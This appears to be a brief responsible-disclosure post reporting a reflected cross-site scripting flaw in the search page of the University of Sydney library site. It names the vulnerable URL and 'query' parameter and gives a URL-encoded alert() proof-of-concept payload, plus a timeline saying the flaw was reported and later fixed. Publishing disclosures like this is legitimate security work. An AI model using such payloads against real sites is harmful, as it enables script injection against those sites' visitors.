Vulnerability : Cross-Site Scripting (XSS) - Reflected
Domain : https://www.sydney.edu.au
Vulnerable URL : https://www.sydney.edu.au/s/search.html?collection=Usyd-Library-External&num_ranks=10&fp_tiers=off&tiers=off&query=
Vulnerable Parameter : query
XSS Payload : %22%3E%3Cscript%3Ealert(%22XSS%20By%20Nayanjyoti%20Roy%22);%3C/script%3E
Timeline :
Apr 20,2021 - Report Sent
Aug 08,2021 - Vulnerability Fixed
Environment :
OS : Windows 10 Home
Browser : Firefox
Version : 88.0 ( 64-bit )
Researcher Name : Nayanjyoti Roy
Proof-Of-Concept video :
0 Comments